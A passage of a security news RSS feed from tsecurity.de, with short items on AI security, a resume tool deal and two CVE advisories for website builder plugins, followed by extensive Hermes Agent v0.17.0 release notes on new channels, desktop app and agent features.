<link>https://tsecurity.de/de/3616709/it-security-nachrichten/builder-culture-is-driving-new-ai-security-challenges/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3616709/it-security-nachrichten/builder-culture-is-driving-new-ai-security-challenges/</guid>
<pubDate>Mon, 22 Jun 2026 23:35:38 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Vanta finds that builder roles are driving AI adoption and introducing new security risks. The post Builder Culture Is Driving New AI Security Challenges  appeared first on eSecurity Planet. This article has been indexed from eSecurity Planet Read the original…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/builder-culture-is-driving-new-ai-security-challenges/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/builder-culture-is-driving-new-ai-security-challenges/">Builder Culture Is Driving New AI Security Challenges</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Beat the Resume Bots With This $39.99 Lifetime Tool]]></title>
<description><![CDATA[This AI resume builder matches your application to each job description and flags missing keywords quickly.
The post Beat the Resume Bots With This $39.99 Lifetime Tool appeared first on TechRepublic.]]></description>
<link>https://tsecurity.de/de/3615199/it-nachrichten/beat-the-resume-bots-with-this-3999-lifetime-tool/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3615199/it-nachrichten/beat-the-resume-bots-with-this-3999-lifetime-tool/</guid>
<pubDate>Mon, 22 Jun 2026 12:48:25 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This AI resume builder matches your application to each job description and flags missing keywords quickly.</p>
<p>The post <a href="https://www.techrepublic.com/article/dashresume-lifetime-subscription/">Beat the Resume Bots With This $39.99 Lifetime Tool</a> appeared first on <a href="https://www.techrepublic.com/">TechRepublic</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2019-25763 | Ultimatebeaver Ultimate Addons for Beaver Builder 1.2.4.1 on Beaver admin-ajax.php authentication bypass (Exploit 47832 / EUVD-2019-20199)]]></title>
<description><![CDATA[A vulnerability was found in Ultimatebeaver Ultimate Addons for Beaver Builder 1.2.4.1 on Beaver. It has been declared as critical. The affected element is an unknown function of the file admin-ajax.php. Executing a manipulation can lead to authentication bypass using alternate channel.

This vul...]]></description>
<link>https://tsecurity.de/de/3612602/sicherheitsluecken/cve-2019-25763-ultimatebeaver-ultimate-addons-for-beaver-builder-1241-on-beaver-admin-ajaxphp-authentication-bypass-exploit-47832-euvd-2019-20199/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3612602/sicherheitsluecken/cve-2019-25763-ultimatebeaver-ultimate-addons-for-beaver-builder-1241-on-beaver-admin-ajaxphp-authentication-bypass-exploit-47832-euvd-2019-20199/</guid>
<pubDate>Sat, 20 Jun 2026 20:07:20 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/ultimatebeaver:ultimate_addons_for_beaver_builder">Ultimatebeaver Ultimate Addons for Beaver Builder 1.2.4.1</a> on Beaver. It has been declared as <a href="https://vuldb.com/kb/risk">critical</a>. The affected element is an unknown function of the file <em>admin-ajax.php</em>. Executing a manipulation can lead to authentication bypass using alternate channel.

This vulnerability is tracked as <a href="https://vuldb.com/cve/CVE-2019-25763">CVE-2019-25763</a>. The attack can be launched remotely. Moreover, an exploit is present.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-48908 | joomshaper SP Page Builder extension for Joomla 1.0.0-6.6.1 on Joomla access control (EUVD-2026-38110)]]></title>
<description><![CDATA[A vulnerability labeled as critical has been found in joomshaper SP Page Builder extension for Joomla 1.0.0-6.6.1 on Joomla. Affected is an unknown function of the component SP Page. Such manipulation leads to improper access controls.

This vulnerability is documented as CVE-2026-48908. The atta...]]></description>
<link>https://tsecurity.de/de/3612600/sicherheitsluecken/cve-2026-48908-joomshaper-sp-page-builder-extension-for-joomla-100-661-on-joomla-access-control-euvd-2026-38110/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3612600/sicherheitsluecken/cve-2026-48908-joomshaper-sp-page-builder-extension-for-joomla-100-661-on-joomla-access-control-euvd-2026-38110/</guid>
<pubDate>Sat, 20 Jun 2026 20:07:18 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/kb/risk">critical</a> has been found in <a href="https://vuldb.com/product/joomshaper:sp_page_builder_extension_for_joomla">joomshaper SP Page Builder extension for Joomla 1.0.0-6.6.1</a> on Joomla. Affected is an unknown function of the component <em>SP Page</em>. Such manipulation leads to improper access controls.

This vulnerability is documented as <a href="https://vuldb.com/cve/CVE-2026-48908">CVE-2026-48908</a>. The attack can be executed remotely. There is not any exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Hermes Agent v0.17.0 (v2026.6.19)]]></title>
<description><![CDATA[Hermes Agent v0.17.0 (v2026.6.19)
Release Date: June 19, 2026
Since v0.16.0: ~1,475 commits · ~800 merged PRs · 1,693 files changed · 235,390 insertions · 50,730 deletions · 300+ issues closed · 245 community contributors

The Reach Release. v0.16.0 put Hermes on your desktop. v0.17.0 is about ho...]]></description>
<link>https://tsecurity.de/de/3611226/downloads/hermes-agent-v0170-v2026619/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3611226/downloads/hermes-agent-v0170-v2026619/</guid>
<pubDate>Fri, 19 Jun 2026 21:46:52 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h1>Hermes Agent v0.17.0 (v2026.6.19)</h1>
<p><strong>Release Date:</strong> June 19, 2026<br>
<strong>Since v0.16.0:</strong> ~1,475 commits · ~800 merged PRs · 1,693 files changed · 235,390 insertions · 50,730 deletions · 300+ issues closed · 245 community contributors</p>
<blockquote>
<p><strong>The Reach Release.</strong> v0.16.0 put Hermes on your desktop. v0.17.0 is about how far that reach extends — across new places to talk to it, deeper into the tools you already use, and out to the people running Hermes for a team. Hermes reached two new channels (iMessage via Photon, and the Raft agent network), the desktop app gained substantial new capability, subagents can now run in the background, image generation learned to edit, and Cursor's Composer model is reachable through an xAI Grok subscription. The dashboard got a full profile builder and secure login, the Skills Hub browser was rehauled, the <code>memory</code> tool got a major upgrade, and the curator stopped spending aux-model budget on every routine run. 300+ issues closed ride along, plus a security round.</p>
</blockquote>
<h2>✨ Highlights</h2>
<ul>
<li>
<p><strong>Hermes reaches iMessage — Photon Spectrum, no Mac relay required</strong> — There's now an iMessage platform plugin built on Photon's managed line pool. Run <code>hermes photon login</code>, authenticate with a device code, and Hermes can send and receive iMessage — no Mac sitting in a closet running a relay, no BlueBubbles bridge to babysit. It's positioned as the successor to BlueBubbles: free to start, nothing to self-host. If your friends and family live in the blue bubbles, Hermes lives there now too. (<a href="https://github.com/NousResearch/hermes-agent/pull/32348" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/32348/hovercard">#32348</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42582" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42582/hovercard">#42582</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44713" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44713/hovercard">#44713</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Raft — Hermes joins the Raft agent network as a gateway channel</strong> — A new bundled Raft platform adapter lets Hermes connect to <a href="https://raft.build/" rel="nofollow">Raft</a> as an external agent through a wake-channel bridge. Set <code>RAFT_PROFILE</code>, run the bridge, and Raft can wake Hermes to handle messages — with a privacy-by-contract design where wake payloads carry only metadata (event IDs, timestamps), never message bodies. Another surface where Hermes can show up and do work. (<a href="https://github.com/NousResearch/hermes-agent/pull/48210" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/48210/hovercard">#48210</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xxchan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xxchan">@xxchan</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>A substantially more capable desktop app</strong> — v0.16.0 shipped the desktop app; v0.17.0 deepened it across dozens of PRs. Rebindable keyboard shortcuts, native OS notifications with per-type toggles, live subagent <strong>watch-windows</strong> that stream a delegated agent's activity into its own pane, a composer model selector with per-model presets, automatic RTL/bidi text direction, a resizable VS Code-themed terminal pane, per-thread composer drafts, and the ability to install <strong>any VS Code Marketplace theme</strong> directly into the app. The desktop is now a serious daily driver, not a preview. (<a href="https://github.com/NousResearch/hermes-agent/pull/45866" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/45866/hovercard">#45866</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/40660" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40660/hovercard">#40660</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/47060" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47060/hovercard">#47060</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/46959" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/46959/hovercard">#46959</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43292" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43292/hovercard">#43292</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44596" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44596/hovercard">#44596</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Background / async subagents — delegate work and keep going</strong> — <code>delegate_task(background=true)</code> now dispatches a subagent that runs in the background and returns a handle immediately. You and the model keep working while it churns, and the full result re-enters the conversation as a new turn the moment it finishes. Kick off a long research dive or a multi-step build, then carry on with something else instead of sitting blocked waiting on it. (<a href="https://github.com/NousResearch/hermes-agent/pull/40946" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40946/hovercard">#40946</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/46968" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/46968/hovercard">#46968</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Edit images, not just generate them — image-to-image in <code>image_generate</code></strong> — <code>image_generate</code> can now edit and transform a source image, not only create one from scratch. Pass an existing image and a prompt and it routes to the backend's edit endpoint (same tool, same pattern as <code>video_generate</code>), across every supported image provider. "Make this logo blue," "remove the background," "turn this sketch into a render" — all from the tool you already use. (<a href="https://github.com/NousResearch/hermes-agent/pull/48705" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/48705/hovercard">#48705</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Automation Blueprints — schedule things without learning cron</strong> — Pick an automation by name and Hermes asks you for what it needs — no cron syntax, no <code>slot=value</code> typing. One blueprint definition renders natively on every surface: a form in the dashboard, a slash command in the CLI/TUI/messenger, a conversation with the agent, an entry in the docs catalog. "Daily news briefing at 8am" becomes a thing you set up by answering questions, not by memorizing <code>0 8 * * *</code>. (<a href="https://github.com/NousResearch/hermes-agent/pull/41309" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41309/hovercard">#41309</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Cursor's Composer model, through your xAI Grok subscription</strong> — <code>grok-composer-2.5-fast</code> is now in the xAI OAuth model picker, with its context window reconciled to the full 200k. Composer is the fast coding model behind Cursor — and if you have an xAI Grok subscription, you can now point Hermes at it directly over OAuth, no separate API key. Your Grok plan, Hermes's agent loop, Composer's coding speed. (<a href="https://github.com/NousResearch/hermes-agent/pull/47908" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47908/hovercard">#47908</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/47371" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47371/hovercard">#6f89e17</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Full profile builder in the dashboard</strong> — Build a complete Hermes profile from the browser — pick its model, choose its skills, attach its MCP servers — without hand-editing <code>config.yaml</code>. The dashboard also unified multi-profile management into one machine-wide view with a global profile switcher, so you manage every profile from a single place. (<a href="https://github.com/NousResearch/hermes-agent/pull/39084" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/39084/hovercard">#39084</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44007" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44007/hovercard">#44007</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Skills Hub browser rehaul</strong> — The dashboard's Skills Hub got a ground-up rework: connected hubs, a Featured section, full skill previews before you install, and a security scan on each skill. Browsing and installing skills from the trusted taps (OpenAI, Anthropic, HuggingFace, NVIDIA) is now a real browsing experience, not a flat list. (<a href="https://github.com/NousResearch/hermes-agent/pull/40384" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40384/hovercard">#40384</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43398" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43398/hovercard">#43398</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>The <code>memory</code> tool got a major upgrade — atomic batch operations</strong> — The <code>memory</code> tool gained an <code>operations</code> array that applies a batch of add/replace/remove edits <strong>atomically against the final character budget</strong>. The model can free up space and add new entries in a single call — even when an add alone would overflow the budget — collapsing what used to be a fragile multi-turn dance into one reliable operation. Memory updates are now faster and far less likely to fail mid-edit. (<a href="https://github.com/NousResearch/hermes-agent/pull/48507" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/48507/hovercard">#48507</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Secure dashboard login</strong> — The dashboard's authentication was hardened: every token-required endpoint now correctly returns 401 behind the OAuth gate, websocket auth uses the served dashboard token, and a warning fires when a <code>public_url</code> override is silently rejected. Exposing your dashboard to the network is safer by default. (<a href="https://github.com/NousResearch/hermes-agent/pull/42578" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42578/hovercard">#42578</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43214" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43214/hovercard">#42578</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Official WhatsApp Business Cloud API adapter</strong> — Alongside the existing Baileys bridge, Hermes now speaks the <strong>official</strong> WhatsApp Business Cloud API — Meta's first-party, hosted, no-bridge-process path. Point it at your Business API credentials and Hermes talks WhatsApp through the supported channel, with no QR-scanning bridge process to keep alive. (<a href="https://github.com/NousResearch/hermes-agent/pull/44331" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44331/hovercard">#44331</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43921" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43921/hovercard">#43921</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jquesnelle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jquesnelle">@jquesnelle</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Rich text for Telegram — Bot API 10.1 rich messages</strong> — Telegram replies now render as proper rich messages via Bot API 10.1: better formatting, cleaner long-message handling, native markup instead of flattened text. It's on by default with an opt-out, so your Telegram conversations look the way they should without any configuration. (<a href="https://github.com/NousResearch/hermes-agent/pull/44829" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44829/hovercard">#44829</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/45584" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/45584/hovercard">#45584</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/45953" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/45953/hovercard">#45953</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Curator cost optimization — no aux-model spend on routine runs</strong> — The skill curator now prunes stale skills by default but no longer runs its LLM-powered consolidation pass unless you opt in (<code>curator.consolidate: true</code> or <code>hermes curator run --consolidate</code>). The deterministic inactivity sweep keeps running for free; the opinionated, aux-model-spending "build umbrella skills" fork is now off by default. Routine background curation costs you <strong>zero tokens</strong>. (<a href="https://github.com/NousResearch/hermes-agent/pull/47840" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47840/hovercard">#47840</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
</ul>
<h2>🖥️ Hermes Desktop App</h2>
<h3>New surfaces &amp; UX</h3>
<ul>
<li>Rebindable keyboard shortcuts panel; native OS notifications with per-type toggles; curated turn-completion cue + dismissable error banners (<a href="https://github.com/NousResearch/hermes-agent/pull/40660" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40660/hovercard">#40660</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/45866" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/45866/hovercard">#45866</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42480" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42480/hovercard">#42480</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/47985" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47985/hovercard">#47985</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Live subagent <strong>watch-windows</strong> — stream a delegated agent's activity into its own pane; composer status stack + editable prompts; open any chat in its own window; new-session-in-compact-window hotkey (<a href="https://github.com/NousResearch/hermes-agent/pull/47060" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47060/hovercard">#47060</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44630" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44630/hovercard">#44630</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43219" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43219/hovercard">#43219</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/46951" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/46951/hovercard">#46951</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Composer model selector + per-model presets + external-provider disconnect; surface every provider/model from <code>hermes model</code> in the GUI; unify provider list to one source; warn when a main-model switch leaves auxiliary tasks pinned elsewhere (<a href="https://github.com/NousResearch/hermes-agent/pull/46959" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/46959/hovercard">#46959</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/40563" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40563/hovercard">#40563</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/49080" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49080/hovercard">#49080</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/40286" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40286/hovercard">#40286</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>Install <strong>any VS Code Marketplace theme</strong>; assignable themes per profile; window translucency slider; unified overlay design system + BrandMark + onboarding redesign (<a href="https://github.com/NousResearch/hermes-agent/pull/43292" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43292/hovercard">#43292</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42286" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42286/hovercard">#42286</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/45086" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/45086/hovercard">#45086</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/40708" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40708/hovercard">#40708</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>Resizable VS Code-themed terminal pane + palette polish; auto-detect RTL/bidi text direction in chat; Mac-style session switcher (^Tab / ^1-9); worktree-aware sidebar grouping; hover-reveal collapsed sidebars; messaging source folders in sidebar (<a href="https://github.com/NousResearch/hermes-agent/pull/42521" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42521/hovercard">#42521</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44596" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44596/hovercard">#44596</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43111" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43111/hovercard">#43111</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/45273" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/45273/hovercard">#45273</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41670" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41670/hovercard">#41670</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41751" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41751/hovercard">#41751</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>Arrow-key history + queue editing in composer; expand full command inline from the approval bar; follow-streaming-at-bottom + jump-to-bottom button; first-class cron jobs in the sidebar + dashboard scheduler (<a href="https://github.com/NousResearch/hermes-agent/pull/40234" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40234/hovercard">#40234</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44864" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44864/hovercard">#44864</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/45263" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/45263/hovercard">#45263</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/40684" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40684/hovercard">#40684</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Desktop pets — pop-out overlay + notifications (<a href="https://github.com/NousResearch/hermes-agent/pull/47938" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47938/hovercard">#47938</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Full tool-backend config (pickers + per-backend settings) in Settings; run tool-backend post-setup installs from the GUI; uninstall the Chat GUI without removing the agent; Shift+click status-bar zap to toggle YOLO globally; <code>/browser connect</code> on a local gateway (<a href="https://github.com/NousResearch/hermes-agent/pull/41232" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41232/hovercard">#41232</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/40559" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40559/hovercard">#40559</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/40355" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40355/hovercard">#40355</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41666" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41666/hovercard">#41666</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/47245" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47245/hovercard">#47245</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>Japanese + Traditional Chinese language switching (<a href="https://github.com/NousResearch/hermes-agent/pull/40114" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40114/hovercard">#40114</a>)</li>
